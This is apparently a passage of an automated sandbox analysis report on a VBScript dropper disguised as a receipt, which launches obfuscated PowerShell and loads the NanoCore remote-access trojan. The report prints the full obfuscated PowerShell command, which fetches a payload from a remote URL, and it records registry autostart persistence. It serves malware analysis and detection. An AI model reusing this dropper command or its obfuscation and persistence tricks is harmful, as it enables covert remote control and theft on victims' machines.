Source: 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000003.433096509.0000020EAE01D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.432965869.0000020EAE019000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.432380237.0000020EAE013000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.433900532.0000020EAE01E000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000003.00000002.410735258.000002691A89E000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.433824220.0000020EAE009000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.432768134.0000020EAE209000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.433881255.0000020EAE01A000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.430815778.0000020EAFE41000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.434440600.0000020EAE20A000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.432461563.0000020EAE008000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: aspnet_compiler.exe PID: 2548, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\Run\New.vbs, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 16 Items receipt.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\16 Items receipt.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210914Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1v5ek2z.pme.ps1Jump to behavior
Source: classification engineClassification label: mal100.troj.evad.winVBS@6/10@26/3
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\16 Items receipt.vbs'
Source: powershell.exe, 00000003.00000002.404380250.0000026918430000.00000004.00000020.sdmpBinary or memory string: ;.VBp:D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.403297893.000002693259B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.379376693.00000269325E4000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POwerSheLL $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'", "0", "true");

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
